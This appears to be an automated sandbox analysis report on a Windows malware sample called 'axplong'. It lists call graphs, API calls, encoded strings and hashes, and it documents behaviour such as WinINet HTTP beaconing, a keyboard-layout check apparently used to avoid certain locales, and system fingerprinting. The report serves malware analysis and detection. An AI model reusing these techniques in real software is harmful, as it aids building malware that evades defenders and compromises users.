12557->12545 12559 a8b521 std::_Throw_future_error 12558->12559 12560 aa8aaf __cftof 4 API calls 12559->12560 12562 a8b588 __cftof 12559->12562 12561 a8b5cf 12560->12561 12562->12539 12584 a8a140 12585 a8a1c0 12584->12585 12591 a87040 12585->12591 12587 a8a1fc shared_ptr 12588 a8a3ee shared_ptr 12587->12588 12595 a73ea0 12587->12595 12590 a8a3d6 12593 a87081 __cftof __Mtx_init_in_situ 12591->12593 12592 a872b6 12592->12587 12593->12592 12601 a72e80 12593->12601 12596 a73ede 12595->12596 12597 a73f08 12595->12597 12596->12590 12598 a73f18 12597->12598 12644 a72bc0 12597->12644 12598->12590 12602 a72ec6 12601->12602 12606 a72f2f 12601->12606 12603 a8c5dc GetSystemTimePreciseAsFileTime 12602->12603 12604 a72ed2 12603->12604 12607 a72fde 12604->12607 12611 a72edd __Mtx_unlock 12604->12611 12605 a72faf 12605->12592 12606->12605 12612 a8c5dc GetSystemTimePreciseAsFileTime 12606->12612 12608 a8c19a 10 API calls 12607->12608 12609 a72fe4 12608->12609 12610 a8c19a 10 API calls 12609->12610 12613 a72f79 12610->12613 12611->12606 12611->12609 12612->12613 12614 a8c19a 10 API calls 12613->12614 12615 a72f80 __Mtx_unlock 12613->12615 12614->12615 12616 a8c19a 10 API calls 12615->12616 12617 a72f98 __Cnd_broadcast 12615->12617 12616->12617 12617->12605 12618 a8c19a 10 API calls 12617->12618 12619 a72ffc 12618->12619 12620 a8c5dc GetSystemTimePreciseAsFileTime 12619->12620 12628 a73040 shared_ptr __Mtx_unlock 12620->12628 12621 a73185 12622 a8c19a 10 API calls 12621->12622 12623 a7318b 12622->12623 12624 a8c19a 10 API calls 12623->12624 12625 a73191 12624->12625 12626 a8c19a 10 API calls 12625->12626 12632 a73153 __Mtx_unlock 12626->12632 12627 a73167 12627->12592 12628->12621 12628->12623 12628->12627 12631 a8c5dc GetSystemTimePreciseAsFileTime 12628->12631 12629 a8c19a 10 API calls 12630 a7319d 12629->12630 12633 a7311f 12631->12633 12632->12627 12632->12629 12633->12621 12633->12625 12633->12632 12635 a8bc7c 12633->12635 12638 a8baa2 12635->12638 12637 a8bc8c 12637->12633 12639 a8bacc 12638->12639 12640 a8ce9b _xtime_get GetSystemTimePreciseAsFileTime 12639->12640 12641 a8bad4 __Xtime_diff_to_millis2 12639->12641 12642 a8baff __Xtime_diff_to_millis2 12640->12642 12641->12637 12642->12641 12643 a8ce9b _xtime_get GetSystemTimePreciseAsFileTime 12642->12643 12643->12641 12645 a72bce 12644->12645 12651 a8b777 12645->12651 12647 a72c02 12648 a72c09 12647->12648 12657 a72c40 12647->12657 12648->12590 12650 a72c18 std::_Throw_future_error 12652 a8b784 12651->12652 12656 a8b7a3 Concurrency::details::_Reschedule_chore 12651->12656 12660 a8caa7 12652->12660 12654 a8b794 12654->12656 12662 a8b74e 12654->12662 12656->12647 12668 a8b72b 12657->12668 12659 a72c72 shared_ptr 12659->12650 12661 a8cac2 CreateThreadpoolWork 12660->12661 12661->12654 12663 a8b757 Concurrency::details::_Reschedule_chore 12662->12663 12666 a8ccfc 12663->12666 12665 a8b771 12665->12656 12667 a8cd11 TpPostWork 12666->12667 12667->12665 12669 a8b737 12668->12669 12671 a8b747 12668->12671 12669->12671 12672 a8c9a8 12669->12672 12671->12659 12673 a8c9bd TpReleaseWork 12672->12673 12673->12671 12674 aa6559 12675 aa63f7 __cftof 2 API calls 12674->12675 12676 aa656a 12675->12676 12677 a8b85e 12678 a8b6e5 11 API calls 12677->12678 12679 a8b886 12678->12679 12680 a8b648 11 API calls 12679->12680 12681 a8b89f 12680->12681 12260 a786b0 12261 a786b6 12260->12261 12262 aa6659 RtlAllocateHeap 12261->12262 12263 a786c3 12262->12263 12264 a786d6 12263->12264 12265 aa66e7 4 API calls 12263->12265 12266 a786d0 12265->12266 12477 a7dfd0 recv 12478 a7e032 recv 12477->12478 12479 a7e067 recv 12478->12479 12480 a7e0a1 12479->12480 12481 a7e1c3 12480->12481 12482 a8c5dc GetSystemTimePreciseAsFileTime 12480->12482 12483 a7e1fe 12482->12483 12484 a8c19a 10 API calls 12483->12484 12485 a7e268 12484->12485 12563 a7e410 12564 a7e419 12563->12564 12566 a7e435 12563->12566 12564->12566 12567 a7e270 12564->12567 12568 a7e280 __dosmaperr 12567->12568 12569 aa8979 4 API calls 12568->12569 12571 a7e2bd std::_Xinvalid_argument 12569->12571 12570 a7e435 12570->12564 12571->12570 12572 a7e270 4 API calls 12571->12572 12572->12571 12137 a81dd0 12140 a81e6b shared_ptr __dosmaperr 12137->12140 12138 a7e440 6 API calls 12139 a82936 shared_ptr std::_Xinvalid_argument 12138->12139 12140->12139 12149 a81e78 12140->12149 12154 aa8979 12140->12154 12142 a82265 shared_ptr 12142->12139 12158 aa6659 12142->12158 12146 a8268b shared_ptr __dosmaperr 12146->12139 12147 aa8979 4 API calls 12146->12147 12148 a82759 12147->12148 12148->12139 12148->12149 12150 a827d1 12148->12150 12149->12138 12165 a7e440 12150->12165 12152 a82843 12152->12139 12183 a75df0 12152->12183 12155 aa8994 12154->12155 12190 aa86d7 12155->12190 12157 aa899e 12157->12142 12214 aa65a2 12158->12214 12160 a8267a 12160->12149 12161 aa66e7 12160->12161 12162 aa66f3 12161->12162 12164 aa66fd __cftof __dosmaperr 12162->12164 12226 aa6670 12162->12226 12164->12146 12166 a7e489 12165->12166 12249 a7bd60 12166->12249 12168 a7e9a9 shared_ptr 12168->12152 12169 a7e711 12169->12168 12170 a7e440 6 API calls 12169->12170 12172 a7f696 12170->12172 12171 a7f892 shared_ptr 12171->12152 12172->12171 12173 a7e440 6 API calls 12172->12173 12175 a7f973 12173->12175 12174 a7fa45 shared_ptr 12174->12152 12175->12174 12176 aa6659 RtlAllocateHeap 12175->12176 12177 a7fbf1 12176->12177 12178 a7e440 6 API calls 12177->12178 12180 a8054c 12178->12180 12179 a80790 shared_ptr 12179->12152 12180->12179 12181 a7e440 6 API calls 12180->12181 12182 a811f9 12181->12182 12185 a75e28 12183->12185 12184 a75f0e shared_ptr 12184->12139 12185->12184 12186 a76060 RegOpenKeyExA 12185->12186 12187 a7645a shared_ptr 12186->12187 12189 a760b3 __cftof 12186->12189 12187->12139 12188 a76153 RegEnumValueW 12188->12189 12189->12187 12189->12188 12191 aa86e9 12190->12191 12192 aa683a __cftof 4 API calls 12191->12192 12195 aa86fe __cftof __dosmaperr 12191->12195 12194 aa872e 12192->12194 12194->12195 12196 aa8925 12194->12196 12195->12157 12197 aa8962 12196->12197 12198 aa8932 12196->12198 12207 aad2e9 12197->12207 12201 aa8941 __fassign 12198->12201 12202 aad30d 12198->12202 12201->12194 12203 aa683a __cftof 4 API calls 12202->12203 12204 aad32a 12203->12204 12206 aad33a 12204->12206 12211 aaf07f 12204->12211 12206->12201 12208 aad2f4 12207->12208 12209 aab4bb __cftof 4 API calls 12208->12209 12210 aad304 12209->12210 12210->12201 12212 aa683a __cftof 4 API calls 12211->12212 12213 aaf09f __cftof __fassign __freea 12212->12213 12213->12206 12216 aa65ae 12214->12216 12215 aa65b5 __cftof __dosmaperr 12215->12160 12216->12215 12218 aaa783 12216->12218 12219 aaa78f 12218->12219 12222 aaa827 12219->12222 12221 aaa7aa 12221->12215 12224 aaa84a 12222->12224 12223 aad6ef RtlAllocateHeap 12225 aaa890 ___free_lconv_mon 12223->12225 12224->12223 12224->12224 12224->12225 12225->12221 12227 aa6692 12226->12227 12229 aa667d __cftof __dosmaperr ___free_lconv_mon 12226->12229 12227->12229 12230 aa9ef9 12227->12230 12229->12164 12231 aa9f11 12230->12231 12233 aa9f36 12230->12233 12231->12233 12234 ab02f8 12231->12234 12233->12229 12235 ab0304 12234->12235 12237 ab030c __cftof __dosmaperr 12235->12237 12238 ab03ea 12235->12238 12237->12233 12239 ab0410 __cftof __dosmaperr 12238->12239 12240 ab040c 12238->12240 12239->12237 12240->12239 12242 aafb7f 12240->12242 12243 aafbcc 12242->12243 12244 aa683a __cftof 4 API calls 12243->12244 12245 aafbdb __cftof 12244->12245 12246 aafe7b 12245->12246 12247 aad2e9 4 API calls 12245->12247 12248 aac4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 12245->12248 12246->12239 12247->12245 12248->12245 12250 a7bdb2 12249->12250 12253 a7c14e shared_ptr 12249->12253 12251 a7bdc6 InternetOpenW InternetConnectA 12250->12251 12250->12253 12252 a7be3d 12251->12252 12254 a7be53 HttpOpenRequestA 12252->12254 12253->12169 12255 a7be71 shared_ptr 12254->12255 12256 a7bf13 HttpSendRequestA 12255->12256 12258 a7bf2b shared_ptr 12256->12258 12257 a7bfb3 InternetReadFile 12259 a7bfda 12257->12259 12258->12257 12573 a89310 12574 a89325 12573->12574 12575 a89363 12573->12575 12576 a8d041 SleepConditionVariableCS 12574->12576 12577 a8932f 12576->12577 12577->12575 12578 a8cff7 RtlWakeAllConditionVariable 12577->12578 12578->12575 12579 aa6974 12580 aa698c 12579->12580 12581 aa6982 12579->12581 12582 aa68bd 4 API calls 12580->12582 12583 aa69a6 ___free_lconv_mon 12582->12583

                      Executed Functions

                      Function 00A7BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310networkfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 760 a7bd60-a7bdac 761 a7bdb2-a7bdb6 760->761 762 a7c1a1-a7c1c6 call a87f30 760->762 761->762 764 a7bdbc-a7bdc0 761->764 767 a7c1f4-a7c20c 762->767 768 a7c1c8-a7c1d4 762->768 764->762 766 a7bdc6-a7be4f InternetOpenW InternetConnectA call a87870 call a75b20 764->766 791 a7be53-a7be6f HttpOpenRequestA 766->791 792 a7be51 766->792 772 a7c212-a7c21e 767->772 773 a7c158-a7c170 767->773 770 a7c1d6-a7c1e4 768->770 771 a7c1ea-a7c1f1 call a8d593 768->771 770->771 776 a7c26f-a7c274 call aa6b9a 770->776 771->767 778 a7c224-a7c232 772->778 779 a7c14e-a7c155 call a8d593 772->779 780 a7c176-a7c182 773->780 781 a7c243-a7c25f call a8cf21 773->781 778->776 789 a7c234 778->789 779->773 782 a7c239-a7c240 call a8d593 780->782 783 a7c188-a7c196 780->783 782->781 783->776 790 a7c19c 783->790 789->779 790->782 798 a7be71-a7be80 791->798 799 a7bea0-a7bf0f call a87870 call a75b20 call a87870 call a75b20 791->799 792->791 800 a7be96-a7be9d call a8d593 798->800 801 a7be82-a7be90 798->801 812 a7bf13-a7bf29 HttpSendRequestA 799->812 813 a7bf11 799->813 800->799 801->800 814 a7bf2b-a7bf3a 812->814 815 a7bf5a-a7bf82 812->815 813->812 816 a7bf50-a7bf57 call a8d593 814->816 817 a7bf3c-a7bf4a 814->817 818 a7bf84-a7bf93 815->818 819 a7bfb3-a7bfd4 InternetReadFile 815->819 816->815 817->816 822 a7bf95-a7bfa3 818->822 823 a7bfa9-a7bfb0 call a8d593 818->823 820 a7bfda 819->820 824 a7bfe0-a7c090 call aa4180 820->824 822->823 823->819
                      APIs
                      • InternetOpenW.WININET(00AC8D70,00000000,00000000,00000000,00000000), ref: 00A7BDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00A7BE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 00A7BE5A
                      • HttpSendRequestA.WININET(?,00000000), ref: 00A7BF1B
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00A7BFCD
                      • InternetCloseHandle.WININET(?), ref: 00A7C0A7
                      • InternetCloseHandle.WININET(?), ref: 00A7C0AF
                      • InternetCloseHandle.WININET(?), ref: 00A7C0B7
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$8P$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-3094775302
                      • Opcode ID: c3605ae565ee53d4d0c2be4f3203a2743458bfb43ca2ec2a6f820183de0da535
                      • Instruction ID: d116239176539bdb47bfe3dc68bb653ae3ae537712cbeeb2b2beb28945b23e65
                      • Opcode Fuzzy Hash: c3605ae565ee53d4d0c2be4f3203a2743458bfb43ca2ec2a6f820183de0da535
                      • Instruction Fuzzy Hash: D5B1E5B16101189BEB28DF28CC84BEEBB65EF45314F50C1ADF509972C2D7719AC0CBA5
                      Function 00A846C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A87870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00A8795C
                        • Part of subcall function 00A87870: __Cnd_destroy_in_situ.LIBCPMT ref: 00A87968
                        • Part of subcall function 00A87870: __Mtx_destroy_in_situ.LIBCPMT ref: 00A87971
                        • Part of subcall function 00A7BD60: InternetOpenW.WININET(00AC8D70,00000000,00000000,00000000,00000000), ref: 00A7BDED
                        • Part of subcall function 00A7BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00A7BE11
                        • Part of subcall function 00A7BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00A7BE5A
                      • std::_Xinvalid_argument.LIBCPMT ref: 00A84EA2
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                      • API String ID: 2414744145-1662704651
                      • Opcode ID: 6b29ae9790ca89605af81413c9cbf66dcc50dd174e29a7c1fa649f7ede552b6a
                      • Instruction ID: 00b1a672d1d1e83a40057cd96ec9eb4699d0b7155e1a45d6d119b4826c63463e
                      • Opcode Fuzzy Hash: 6b29ae9790ca89605af81413c9cbf66dcc50dd174e29a7c1fa649f7ede552b6a
                      • Instruction Fuzzy Hash: 1E230571E001549BEB19EB38CE8979DBB76AF85304F5481D8E009AB2D2EB359F84CF51
                      Function 00A75DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 915 a75df0-a75eee 921 a75ef0-a75efc 915->921 922 a75f18-a75f25 call a8cf21 915->922 923 a75f0e-a75f15 call a8d593 921->923 924 a75efe-a75f0c 921->924 923->922 924->923 926 a75f26-a760ad call aa6b9a call a8e080 call a87f30 * 5 RegOpenKeyExA 924->926 944 a760b3-a76143 call aa4020 926->944 945 a76478-a76481 926->945 971 a76466-a76472 944->971 972 a76149-a7614d 944->972 947 a76483-a7648e 945->947 948 a764ae-a764b7 945->948 950 a764a4-a764ab call a8d593 947->950 951 a76490-a7649e 947->951 952 a764e4-a764ed 948->952 953 a764b9-a764c4 948->953 950->948 951->950 958 a7659e-a765a3 call aa6b9a 951->958 956 a764ef-a764fa 952->956 957 a7651a-a76523 952->957 954 a764c6-a764d4 953->954 955 a764da-a764e1 call a8d593 953->955 954->955 954->958 955->952 962 a76510-a76517 call a8d593 956->962 963 a764fc-a7650a 956->963 965 a76525-a76530 957->965 966 a7654c-a76555 957->966 962->957 963->958 963->962 975 a76542-a76549 call a8d593 965->975 976 a76532-a76540 965->976 968 a76557-a76566 966->968 969 a76582-a7659d call a8cf21 966->969 977 a76578-a7657f call a8d593 968->977 978 a76568-a76576 968->978 971->945 979 a76153-a76187 RegEnumValueW 972->979 980 a76460 972->980 975->966 976->958 976->975 977->969 978->958 978->977 985 a7644d-a76454 979->985 986 a7618d-a761ad 979->986 980->971 985->979 990 a7645a 985->990 992 a761b0-a761b9 986->992 990->980 992->992 993 a761bb-a7624d call a87c50 call a88090 call a87870 * 2 call a75c60 992->993 993->985
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: 03fea88bb4051b9cf3d4753ff25a1a795e0cd42203d957b66e43df42c590ceec
                      • Instruction ID: 33c900e017b713d5f532c3750f6f0d96895aa98d895c9a50f317b5f42b4262de
                      • Opcode Fuzzy Hash: 03fea88bb4051b9cf3d4753ff25a1a795e0cd42203d957b66e43df42c590ceec
                      • Instruction Fuzzy Hash: C4E17D71900218ABEB29DFA4CD89BDEB779AF04304F5082D9E509A7291DB74AFC4CF51
                      Function 00A77D00 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 392COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1003 a77d00-a77d82 call aa4020 1007 a7827e-a7829b call a8cf21 1003->1007 1008 a77d88-a77db0 call a87870 call a75b20 1003->1008 1015 a77db4-a77dd6 call a87870 call a75b20 1008->1015 1016 a77db2 1008->1016 1021 a77dda-a77df3 1015->1021 1022 a77dd8 1015->1022 1016->1015 1025 a77df5-a77e04 1021->1025 1026 a77e24-a77e4f 1021->1026 1022->1021 1029 a77e06-a77e14 1025->1029 1030 a77e1a-a77e21 call a8d593 1025->1030 1027 a77e51-a77e60 1026->1027 1028 a77e80-a77ea1 1026->1028 1031 a77e76-a77e7d call a8d593 1027->1031 1032 a77e62-a77e70 1027->1032 1033 a77ea7-a77eac 1028->1033 1034 a77ea3-a77ea5 GetNativeSystemInfo 1028->1034 1029->1030 1035 a7829c call aa6b9a 1029->1035 1030->1026 1031->1028 1032->1031 1032->1035 1038 a77ead-a77eb6 1033->1038 1034->1038 1041 a782a1-a782a6 call aa6b9a 1035->1041 1044 a77ed4-a77ed7 1038->1044 1045 a77eb8-a77ebf 1038->1045 1049 a7821f-a78222 1044->1049 1050 a77edd-a77ee6 1044->1050 1047 a77ec5-a77ecf 1045->1047 1048 a78279 1045->1048 1055 a78274 1047->1055 1048->1007 1049->1048 1053 a78224-a7822d 1049->1053 1051 a77ef9-a77efc 1050->1051 1052 a77ee8-a77ef4 1050->1052 1056 a77f02-a77f09 1051->1056 1057 a781fc-a781fe 1051->1057 1052->1055 1058 a78254-a78257 1053->1058 1059 a7822f-a78233 1053->1059 1055->1048 1060 a77f0f-a77f6b call a87870 call a75b20 call a87870 call a75b20 call a75c60 1056->1060 1061 a77fe9-a781e5 call a87870 call a75b20 call a87870 call a75b20 call a75c60 call a87870 call a75b20 call a75640 call a87870 call a75b20 call a87870 call a75b20 call a75c60 call a87870 call a75b20 call a75640 call a87870 call a75b20 call a87870 call a75b20 call a75c60 call a87870 call a75b20 call a75640 1056->1061 1066 a78200-a7820a 1057->1066 1067 a7820c-a7820f 1057->1067 1064 a78265-a78271 1058->1064 1065 a78259-a78263 1058->1065 1062 a78235-a7823a 1059->1062 1063 a78248-a78252 1059->1063 1089 a77f70-a77f77 1060->1089 1102 a781eb-a781f4 1061->1102 1062->1063 1069 a7823c-a78246 1062->1069 1063->1048 1064->1055 1065->1048 1066->1055 1067->1048 1071 a78211-a7821d 1067->1071 1069->1048 1071->1055 1091 a77f7b-a77f9b call aa8a81 1089->1091 1092 a77f79 1089->1092 1097 a77fd2-a77fd4 1091->1097 1098 a77f9d-a77fac 1091->1098 1092->1091 1097->1102 1103 a77fda-a77fe4 1097->1103 1100 a77fc2-a77fcf call a8d593 1098->1100 1101 a77fae-a77fbc 1098->1101 1100->1097 1101->1041 1101->1100 1102->1049 1107 a781f6 1102->1107 1103->1102 1107->1057
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A77EA3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==$IR
                      • API String ID: 1721193555-4204238189
                      • Opcode ID: 6c1f0509027b59173fbb63021ae2616df947be210d3febf103406d9757d2f35a
                      • Instruction ID: bdd2a0bbd70ccafd2ead97be6b3555e5debda786084ea5fac07d21c202eebf7e
                      • Opcode Fuzzy Hash: 6c1f0509027b59173fbb63021ae2616df947be210d3febf103406d9757d2f35a
                      • Instruction Fuzzy Hash: 7AD1E871E00604ABDF14FB68CE5A3AD7771AB42310F54C299E41A6B3D2DB758E81CBD2
                      Function 00AA6E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1141 aa6e01-aa6e36 GetFileType 1142 aa6eee-aa6ef1 1141->1142 1143 aa6e3c-aa6e47 1141->1143 1146 aa6f1a-aa6f42 1142->1146 1147 aa6ef3-aa6ef6 1142->1147 1144 aa6e69-aa6e85 call aa4020 GetFileInformationByHandle 1143->1144 1145 aa6e49-aa6e5a call aa7177 1143->1145 1156 aa6f0b-aa6f18 call aa740d 1144->1156 1162 aa6e8b-aa6ecd call aa70c9 call aa6f71 * 3 1144->1162 1159 aa6e60-aa6e67 1145->1159 1160 aa6f07-aa6f09 1145->1160 1148 aa6f5f-aa6f61 1146->1148 1149 aa6f44-aa6f57 1146->1149 1147->1146 1152 aa6ef8-aa6efa 1147->1152 1154 aa6f62-aa6f70 call a8cf21 1148->1154 1149->1148 1165 aa6f59-aa6f5c 1149->1165 1152->1156 1157 aa6efc-aa6f01 call aa7443 1152->1157 1156->1160 1157->1160 1159->1144 1160->1154 1177 aa6ed2-aa6eea call aa7096 1162->1177 1165->1148 1177->1148 1180 aa6eec 1177->1180 1180->1160
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00AA6E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00AA6E7D
                      • __dosmaperr.LIBCMT ref: 00AA6F12
                        • Part of subcall function 00AA7177: __dosmaperr.LIBCMT ref: 00AA71AC
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
